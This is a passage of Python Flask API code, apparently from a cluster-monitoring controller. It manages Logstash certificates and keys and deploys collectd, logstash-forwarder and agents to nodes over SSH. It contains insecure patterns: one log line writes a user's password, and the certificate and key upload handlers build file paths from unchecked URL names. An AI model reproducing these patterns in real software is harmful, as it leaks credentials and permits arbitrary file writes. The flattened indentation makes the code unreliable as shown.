if credAll is None:
response = jsonify({'Status': 'No credentials set!'})
response.status_code = 404
return response
for nl in credAll:
credDict = {}
# print >> sys.stderr, nl[0]
app.logger.info('[%s] : [INFO] Credentials host %s!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nl[0])
credDict['LS Host'] = nl[0]
credDict['Certificate'] = nl[2]
credDict['Key'] = nl[3]
credList.append(credDict)
response = jsonify({'Credentials': credList})
response.status_code = 200
return response
# def post(self):
# qLSCore = dbSCore.query.first()
# if qLSCore is None:
# response = jsonify({'Status':'No LS Core set!'})
# response.status_code = 404
# return response
# templateLoader = jinja2.FileSystemLoader( searchpath="/" )
# templateEnv = jinja2.Environment( loader=templateLoader )
# oSSLTemp= os.path.join(tmpDir,'openssl.tmp')
# oSSLLoc = os.path.join(cfgDir,'openssl.cnf')
# template = templateEnv.get_template( oSSLTemp )
# osslPop = {"LSHostIP":qLSCore.hostIP}
# oSSLConf = template.render(osslPop)
# osslFile = open(lsfCore,"wb")
# osslFile.write(oSSLLoc)
# osslFile.close()
@dmon.route('/v1/overlord/core/ls/cert/<certName>')
@api.doc(params={'certName': 'Name of the certificate'})
class LSCertQuery(Resource):
def get(self, certName):
qSCoreCert = dbSCore.query.filter_by(sslCert=certName).all()
certList = []
for i in qSCoreCert:
certList.append(i.hostFQDN)
if not certList:
response = jsonify({'Status': certName + ' not found!'})
response.status_code = 404
return response
else:
response = jsonify({'Hosts': certList})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/cert/<certName>/<hostFQDN>')
@api.doc(params={'certName': 'Name of the certificate',
'hostFQDN': 'Host FQDN'})
class LSCertControl(Resource):
@api.expect(certModel) # TODO FIX THIS
def put(self, certName, hostFQDN):
if request.headers['Content-Type'] == 'application/x-pem-file':
pemData = request.data
else:
abort(400)
qSCoreCert = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qSCoreCert is None:
response = jsonify({'Status': 'unknown host'})
response.status_code = 404
return response
else:
if certName == 'default':
crtFile = os.path.join(credDir, 'logstash-forwarder.crt')
else:
crtFile = os.path.join(credDir, certName + '.crt')
try:
cert = open(crtFile, 'w+')
cert.write(pemData)
cert.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
qSCoreCert.sslCert = certName
response = jsonify({'Status': 'updated certificate!'})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/ls/key/<keyName>')
@api.doc(params={'keyName': 'Name of the private key.'})
class LSKeyQuery(Resource):
def get(self, keyName):
if keyName == 'default':
response = jsonify({'Key': 'default'})
response.status_code = 200
return response
qSCoreKey = dbSCore.query.filter_by(sslKey=keyName).first()
if qSCoreKey is None:
response = jsonify({'Status': keyName + ' not found!'})
response.status_code = 404
return response
response = jsonify({'Host': qSCoreKey.hostFQDN, 'Key': qSCoreKey.sslKey})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/key/<keyName>/<hostFQDN>')
@api.doc(params={'keyName': 'Name of the private key.', 'hostFQDN': 'Host FQDN'})
class LSKeyControl(Resource):
def put(self, keyName, hostFQDN):
if request.headers['Content-Type'] == 'application/x-pem-file':
pemData = request.data
else:
abort(400)
qSCoreKey = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qSCoreKey is None:
response = jsonify({'Status': 'unknown host'})
response.status_code = 404
return response
else:
if keyName == 'default':
keyFile = os.path.join(credDir, 'logstash-forwarder.key')
else:
keyFile = os.path.join(credDir, keyName + '.key')
try:
key = open(keyFile, 'w+')
key.write(pemData)
key.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
qSCoreKey.sslKey = keyName
response = jsonify({'Status': 'updated key!'})
response.status_code = 201
return response
@dmon.route('/v1/overlord/aux')
class AuxInfo(Resource):
def get(self):
response = jsonify({'AuxComponents': ['collectd', 'logstash-forwarder', 'jmx']})
response.status_code = 200
return response
@dmon.route('/v1/overlord/aux/deploy')
class AuxDeploy(Resource):
def get(self):
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP, dbNodes.nMonitored,
dbNodes.nCollectdState, dbNodes.nLogstashForwState, dbNodes.nLogstashInstance).all()
mnList = []
for nm in qNodes:
mNode = {}
mNode['NodeFQDN'] = nm[0]
mNode['NodeIP'] = nm[1]
mNode['Monitored'] = nm[2]
mNode['Collectd'] = nm[3]
mNode['LSF'] = nm[4]
mNode['LSInstance'] = nm[5]
mnList.append(mNode)
# print >> sys.stderr, nm
response = jsonify({'Aux Status': mnList})
response.status_code = 200
return response
@api.doc(parser=dmonAuxAll) # TODO Status handling (Running, Stopped, None )Needs Checking
def post(self): # TODO currently works only if the same username and password is used for all Nodes
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
lsfTemp = os.path.join(tmpDir, 'logstash-forwarder.tmp') # tmpDir+"/collectd.tmp"
collectdTemp = os.path.join(tmpDir, 'collectd.tmp')
collectdConfLoc = os.path.join(cfgDir, 'collectd.conf')
lsfConfLoc = os.path.join(cfgDir, 'logstash-forwarder.conf')
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nMonitored,
dbNodes.nCollectdState, dbNodes.nLogstashForwState, dbNodes.nUser, dbNodes.nPass,
dbNodes.nodeIP, dbNodes.nLogstashInstance).all()
result = []
credentials = {}
for n in qNodes:
credentials['User'] = n[4] # TODO need a more elegant solution, currently it is rewriten every iteration
credentials['Pass'] = n[5]
# print >> sys.stderr, credentials
app.logger.info('[%s] : [INFO] Credentials used %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), credentials)
rp = {}
if n[1] == False: # check if node is monitored
rp['Node'] = n[0]
rp['Collectd'] = n[2]
rp['LSF'] = n[3]
rp['IP'] = n[6]
rp['LSInstance'] = n[7]
# rp['User']=n[4]
# rp['Pass']=n[5]
result.append(rp)
collectdList = []
LSFList = []
allNodes = []
for res in result:
if res['Collectd'] == 'None':
# print >> sys.stderr, 'No collectd!'
app.logger.info('[%s] : [INFO] No collectd',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
collectdList.append(res['IP'])
if res['LSF'] == 'None':
LSFList.append(res['IP'])
app.logger.info('[%s] : [INFO] No LSF',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
# print >> sys.stderr, 'No LSF!'
allNodes.append(res['IP'])
args = dmonAuxAll.parse_args()
if args == 'redeploy-all': # TODO check if conf files exist if not catch error
uploadFile(allNodes, credentials['User'], credentials['Pass'], collectdConfLoc, 'collectd.conf',
'/etc/collectd/collectd.conf')
uploadFile(allNodes, credentials['User'], credentials['Pass'], lsfConfLoc, 'logstash-forwarder.conf',
'/etc/logstash-forwarder.conf')
serviceCtrl(allNodes, credentials['User'], credentials['Pass'], 'collectd', 'restart')
serviceCtrl(allNodes, credentials['User'], credentials['Pass'], 'logstash-forwarder', 'restart')
response = jsonify({'Status': 'All aux components reloaded!'})
response.status_code = 200
return response
if not collectdList and not LSFList:
response = jsonify({'Status': 'All registred nodes are already monitored!'})
response.status_code = 200
return response
app.logger.info('[%s] : [INFO] Collectd list -> %s, LSFList -> %s, credentials -> %s, Conf dir -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), collectdList, LSFList, credentials['User'], confDir)
# print >> sys.stderr, collectdList
# print >> sys.stderr, LSFList
# print >> sys.stderr, credentials['User']
# print >> sys.stderr, confDir
qSCore = dbSCore.query.first() # TODO Change for distributed deployment
if qSCore is None:
response = jsonify({'Status': 'DB empty',
'Message': 'There is no logstash instance registered!'})
response.status_code = 400
return response
try:
lsfTemplate = templateEnv.get_template(lsfTemp)
# print >>sys.stderr, template
except:
app.logger.error('[%s] : [ERROR] Template file unavailable',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable'})
response.status_code = 500
return response
# {{ESCoreIP}}:{{LSLumberPort}}
infolsfAux = {"ESCoreIP": qSCore.hostIP, "LSLumberPort": qSCore.inLumberPort}
lsfConf = lsfTemplate.render(infolsfAux)
lsfConfFile = open(lsfConfLoc, "wb") # TODO trycatch
lsfConfFile.write(lsfConf)
lsfConfFile.close()
# {{logstash_server_ip}}" "{{logstash_server_port}}
try:
collectdTemplate = templateEnv.get_template(collectdTemp)
except:
app.logger.error('[%s] : [ERROR] Template file unavailable',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Template file unavailable'})
response.status_code = 500
return response
# return "Template file unavailable!"
infocollectdAux = {"logstash_server_ip": qSCore.hostIP, "logstash_server_port": qSCore.udpPort}
collectdConf = collectdTemplate.render(infocollectdAux)
collectdConfFile = open(collectdConfLoc, "wb")
collectdConfFile.write(collectdConf)
collectdConfFile.close()
try:
installCollectd(collectdList, credentials['User'], credentials['Pass'], confDir=cfgDir)
except Exception as inst: # TODO if exceptions is detected check to see if collectd started if not return fail if yes return warning
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error('[%s] : [ERROR] Cannot install collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error Installing collectd!'})
response.status_code = 500
return response
# TODO Assign logsash server instance to each node
try:
installLogstashForwarder(LSFList, userName=credentials['User'], uPassword=credentials['Pass'],
confDir=cfgDir)
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error('[%s] : [ERROR] Cannot install lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error Installing LSF!'})
response.status_code = 500
return response
for c in collectdList:
updateNodesCollectd = dbNodes.query.filter_by(nodeIP=c).first()
if updateNodesCollectd is None:
response = jsonify({'Error': 'DB error, IP ' + c + ' not found!'})
response.status_code = 500
return response
updateNodesCollectd.nCollectdState = 'Running'
for l in LSFList:
updateNodesLSF = dbNodes.query.filter_by(nodeIP=l).first()
if updateNodesLSF is None:
response = jsonify({'Error': 'DB error, IP ' + l + ' not found!'})
response.status_code = 500
return response
updateNodesLSF.nLogstashForwState = 'Running'
updateAll = dbNodes.query.filter_by(nMonitored=0).all()
for ua in updateAll:
ua.nMonitored = 1
response = jsonify({'Status': 'Aux Componnets deployed!'})
response.status_code = 201
return response
@dmon.route('/v2/overlord/aux/agent') # TODO: create better variant
class AuxAgentDeploy(Resource):
def get(self):
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nStatus).all()
an = []
for n in qNodes:
nAgent = {}
nAgent['NodeFQDN'] = n[0]
nAgent['Agent'] = n[1]
an.append(nAgent)
response = jsonify({'Agents': an})
response.status_code = 200
app.logger.info('[%s] : [INFO] Agents status: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(an))
return response
def post(self): # todo verify
qN = db.session.query(dbNodes.nodeIP, dbNodes.nStatus, dbNodes.nUser, dbNodes.nPass).all()
if not qN:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
noAgent = []
user = ' '
password = ' '
for n in qN:
if not n[1]:
noAgent.append(n[0])
user = n[2]
password = n[3]
if not noAgent:
response = jsonify({'Status': 'All nodes have unpacked agents'})
response.status_code = 200
app.logger.info('[%s] : [INFO] All nodes have unpacked agents',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
deployAgent(noAgent, user, password)
except Exception as inst:
response = jsonify({'Status': 'Agent Error',
'Message': 'Error while deploying agent!'})
app.logger.error('[%s] : [ERROR] Failed to deploy agent %s with %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response.status_code = 500
return response
for a in noAgent:
updateAll = dbNodes.query.filter_by(nodeIP=a).first()
updateAll.nStatus = 1
response = jsonify({'Status': 'Done', 'Message': 'Agents Installed!'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Agents installed',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
@dmon.route('/v2/overlord/agent/start')
class AuxAgentStart(Resource):
def post(self):
qNodeStatus = dbNodes.query.filter_by(nStatus=1).all()
app.logger.info('[%s] : [INFO] Node Status %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qNodeStatus))
if not qNodeStatus:
response = jsonify({'Status': 'Agent Exception',
'Message': 'No agents are registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No agents registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
dnode = []
nnodes = []
for ns in qNodeStatus:
node = []
if ns.nMonitored is True:
break
else:
node.append(ns.nodeIP)
app.logger.info('[%s] : [INFO] Unmonitored nodes %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
AgentNodes = {}
try:
startAgent(node, ns.nUser, ns.nPass)
ns.nMonitored = 1
app.logger.info('[%s] : [INFO] Started agent at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
AgentNodes['Node'] = ns.nodeFQDN
AgentNodes['IP'] = ns.nodeIP
dnode.append(AgentNodes)
except Exception as inst:
app.logger.error('[%s] : [INFO] Error starting agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(ns.nodeFQDN), type(inst), inst.args)
AgentNodes['Node'] = ns.nodeFQDN
AgentNodes['IP'] = ns.nodeIP
nnodes.append(AgentNodes)
break
response = jsonify({'Status': 'Agents Started',
'Sucessfull': dnode,
'Failed': nnodes})
response.status_code = 200
app.logger.info('[%s] : [INFO] Agents started on nodes %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(dnode))
return response
@dmon.route('/v2/overlord/agent/stop') #todo verify
class AuxAgentStop(Resource):
def post(self):
qNodeStatus = dbNodes.query.filter_by(nMonitored=1).all()
if not qNodeStatus:
response = jsonify({'Status': 'Agent Exception',
'Message': 'No agents are registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No agents registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
dnode = []
for ns in qNodeStatus:
node = []
node.append(ns.nodeIP)
app.logger.info('[%s] : [INFO] Monitored nodes %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
try:
stopAgent(node, ns.nUser, ns.nPass)
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Stopping agent on ' + ns.nodeFQDN + '!'})
response.status_code = 500
app.logger.error('[%s] : [INFO] Error stopping agent on %s with exception %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(ns.nodeFQDN), type(inst), inst.args)
return response
app.logger.info('[%s] : [INFO] Stopped agent at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(node))
AgentNodes = {}
AgentNodes['Node'] = ns.nodeFQDN
AgentNodes['IP'] = ns.nodeIP
dnode.append(AgentNodes)
ns.nMonitored = 0
response = jsonify({'Status': 'Agents Stopped',
'Nodes': dnode})
response.status_code = 200
app.logger.info('[%s] : [INFO] Agents stopped on nodes %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(dnode))
return response
@dmon.route('/v2/overlord/aux/status')
class AuxDeployStatus(Resource):
def get(self):
qNodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP, dbNodes.nMonitored, dbNodes.nStatus,
dbNodes.nCollectdState, dbNodes.nLogstashForwState).all()
mnList = []
for nm in qNodes:
mNode = {}
mNode['NodeFQDN'] = nm[0]
mNode['NodeIP'] = nm[1]
mNode['Monitored'] = nm[2]
mNode['Status'] = nm[3]
mNode['Collectd'] = nm[4]
mNode['LSF'] = nm[5]
mnList.append(mNode)
# print >> sys.stderr, nm
app.logger.info('[%s] : [INFO] Nodes -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(mnList))
response = jsonify({'Aux Status': mnList})
response.status_code = 200
return response
@dmon.route('/v2/overlord/aux/deploy') # TODO: gets current status of aux components and deploy them based on roles
class AuxDeployThread(Resource):
# def put(self): # TODO: used to enact new configurations
# return "Reload new Configuration"
def post(self):
qNodes = db.session.query(dbNodes.nodeIP, dbNodes.nRoles).all()
if not qNodes:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nrList = []
for nr in qNodes:
nrNode = {}
nrNode[nr[0]] = nr[1].split(',')
nrList.append(nrNode)
app.logger.info('[%s] : [INFO] Node list -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nrList))
resFin = {}
for e in nrList:
for k, v in e.iteritems():
nodeList = []
nodeList.append(k)
agentr = AgentResourceConstructor(nodeList, '5222')
resourceList = agentr.deploy()
r = {'roles': v}
resFin[resourceList[-1]] = r
app.logger.info('[%s] : [INFO] Resource List %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), resFin)
dmon = GreenletRequests(resFin)
nodeRes = dmon.parallelPost(None)
app.logger.info('[%s] : [INFO] Node resources %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeRes))
# print >> sys.stderr, str(nodeRes)
failedNodes = []
NodeDict = {}
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
qNode.nMonitored = 1 # TODO: Recheck nStatus and nMonitored roles when are they true and when are they false
if n['StatusCode'] != 201:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
# print >> sys.stderr, str(n['Data']['Components'])
# print >> sys.stderr, str(n)
app.logger.debug('[%s] : [DEBUG] Node response -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(n))
try:
NodeDict[nodeIP.hostname] = n['Data']['Components']
except Exception as inst:
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
app.logger.error('[%s] : [ERROR] Keys missing, exception %s with %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
NodeDict[nodeIP.hostname] = "Failed"
response = jsonify({'Status': 'Installed Aux ',
'Message': NodeDict,
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
@dmon.route('/v2/overlord/aux/deploy/check')
class AuxDeployCheckThread(Resource):
def get(self):
agentPort = '5222'
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
return response
nodeList = []
for n in nodesAll:
nodeList.append(n[1])
agentr = AgentResourceConstructor(nodeList, agentPort)
resourceList = agentr.check()
dmon = GreenletRequests(resourceList)
nodeRes = dmon.parallelGet()
failedNodes = []
for i in nodeRes:
nodeIP = urlparse(i['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
if i['Data'] != 'n/a':
qNode.nMonitored = 1
qNode.nStatus = 1
if i['Data']['LSF'] == 1:
qNode.nLogstashForwState = "Running"
elif i['Data']['LSF'] == 0:
qNode.nLogstashForwState = "Stopped"
else:
qNode.nLogstashForwState = "None"
if i['Data']['Collectd'] == 1:
qNode.nCollectdState = "Running"
elif i['Data']['Collectd'] == 0:
qNode.nCollectdState = "Stopped"
else:
qNode.nCollectdState = "None"
else:
qNode.nLogstashForwState = "None"
qNode.nCollectdState = "None"
if i['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': i['StatusCode']})
qNode.nMonitored = 0
response = jsonify({'Status': 'Update',
'Message': 'Nodes updated!',
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
@dmon.route('/v1/overlord/aux/deploy/<auxComp>/<nodeFQDN>') # TODO check parameter redeploy functionality
@api.doc(params={'auxComp': 'Aux Component',
'nodeFQDN': 'Node FQDN'}) # TODO document nMonitored set to true when first started monitoring
class AuxDeploySelective(Resource):
@api.doc(parser=dmonAux)
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf']
# status = {}
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
return response
args = dmonAux.parse_args()
node = []
node.append(qAux.nodeIP)
if auxComp == 'collectd':
if args == 'redeploy':
if qAux.nCollectdState != 'Running':
response = jsonify({'Status:No collectd instance to restart!'})
response.status_code = 404
return response
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'collectd', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting Collectd on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'Collectd restarted on ' + nodeFQDN})
response.status_code = 200
return response
if qAux.nCollectdState == 'None':
try:
installCollectd(node, qAux.nUser, qAux.nPass, confDir=cfgDir)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot install collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Installing Collectd on ' + qAux.nodeFQDN + '!'})
response.status_code = 500
return response
# status[auxComp] = 'Running'
qAux.nCollectdState = 'Running'
response = jsonify({'Status': 'Collectd started on ' + nodeFQDN + '.'})
response.status_code = 201
return response
else:
response = jsonify({'Status': 'Node ' + nodeFQDN + 'collectd already started!'})
response.status_code = 200
return response
elif auxComp == 'lsf':
if args == 'redeploy':
if qAux.nLogstashForwState != 'Running':
response = jsonify({'Status:No LSF instance to restart!'})
response.status_code = 404
return response
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'logstash-forwarder', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting LSF on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'LSF restarted on ' + nodeFQDN})
response.status_code = 200
return response
if qAux.nLogstashForwState == 'None':
try:
installLogstashForwarder(node, qAux.nUser, qAux.nPass, confDir=cfgDir)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot install lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Installing LSF on ' + qAux.nodeFQDN + '!'})
response.status_code = 500
return response
# status[auxComp] = 'Running'
qAux.nLogstashForwState = 'Running'
response = jsonify({'Status': 'LSF started on ' + nodeFQDN + '.'})
response.status_code = 201
return response
else:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' LSF already started!'})
response.status_code = 200
return response
@dmon.route('/v2/overlord/aux/<auxComp>/<nodeFQDN>/configure') # TODO: deploy specific configuration on the specified node
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxDeploySelectiveThread(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf', 'jmx']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Component %s not in supported list %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), auxComp, str(auxList))
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Node %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
if auxComp == 'collectd':
return 'collectd'
elif auxComp == 'lsf':
return 'lsf'
elif auxComp == 'jmx':
return 'jmx'
else:
return 'error'
@dmon.route('/v1/overlord/aux/<auxComp>/config')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxConfigSelective(Resource):
def get(self, auxComp):
allowed = ['collectd', 'lsf']
if auxComp not in allowed:
response = jsonify({'Status': 'unrecognized aux component ' + auxComp})
response.status_code = 404
return response
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
return response
if auxComp == 'collectd':
if not os.path.isfile(os.path.join(cfgDir, 'collectd.conf')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
Cfgfile = open(os.path.join(cfgDir, 'collectd.conf'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
if auxComp == 'lsf':
if not os.path.isfile(os.path.join(cfgDir, 'logstash-forwarder.conf')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
Cfgfile = open(os.path.join(cfgDir, 'logstash-forwarder.conf'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return send_file(Cfgfile, mimetype='text/plain', as_attachment=True)
def put(self, auxComp): #todo remove or leave
return "Sets configuration of aux components use parameters (args) -unsafe"
@dmon.route('/v1/overlord/aux/<auxComp>/start')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStartAll(Resource):
def post(self, auxComp): # TODO create function that can be reused for both start and stop of all components
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
return response
if auxComp == "collectd":
qNCollectd = dbNodes.query.filter_by(nCollectdState='Stopped').all()
if not qNCollectd:
response = jsonify({'Status': 'No nodes in state Stopped!'})
response.status_code = 404
return response
nodeCollectdStopped = []
for i in qNCollectd:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'collectd', 'start')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
# response = jsonify({'Status':'Error Starting collectd on '+ i.nodeFQDN +'!'})
# response.status_code = 500 # todo check if return is required for collectd
# return response
CollectdNodes = {}
CollectdNodes['Node'] = i.nodeFQDN
CollectdNodes['IP'] = i.nodeIP
nodeCollectdStopped.append(CollectdNodes)
i.nCollectdState = 'Running'
response = jsonify({'Status': 'Collectd started', 'Nodes': nodeCollectdStopped})
response.status_code = 200
return response
if auxComp == "lsf":
qNLsf = dbNodes.query.filter_by(nLogstashForwState='Stopped').all()
if not qNLsf:
response = jsonify({'Status': 'No nodes in state Stopped!'})
response.status_code = 404
return response
nodeLsfStopped = []
for i in qNLsf:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'logstash-forwarder', 'start')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
# response = jsonify({'Status': 'Error Starting LSF on ' + i.nodeFQDN + '!'})
# response.status_code = 500 # todo check if return is required for collectd
# return response
LsfNodes = {}
LsfNodes['Node'] = i.nodeFQDN
LsfNodes['IP'] = i.nodeIP
nodeLsfStopped.append(LsfNodes)
i.nLogstashForwState = 'Running'
response = jsonify({'Status': 'LSF started', 'Nodes': nodeLsfStopped})
response.status_code = 200
return response
@dmon.route('/v1/overlord/aux/<auxComp>/stop') # auxCtrl(auxComp,'stop') #TODO revise from pysshCore and make it work!
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStopAll(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
if auxComp == "collectd":
qNCollectd = dbNodes.query.filter_by(nCollectdState='Running').all()
if not qNCollectd:
response = jsonify({'Status': 'No nodes in Running state!'})
response.status_code = 404
return response
nodeCollectdRunning = []
for i in qNCollectd:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'collectd', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Stopping collectd on ' + i.nodeFQDN + '!'})
response.status_code = 500
return response
CollectdNodes = {}
CollectdNodes['Node'] = i.nodeFQDN
CollectdNodes['IP'] = i.nodeIP
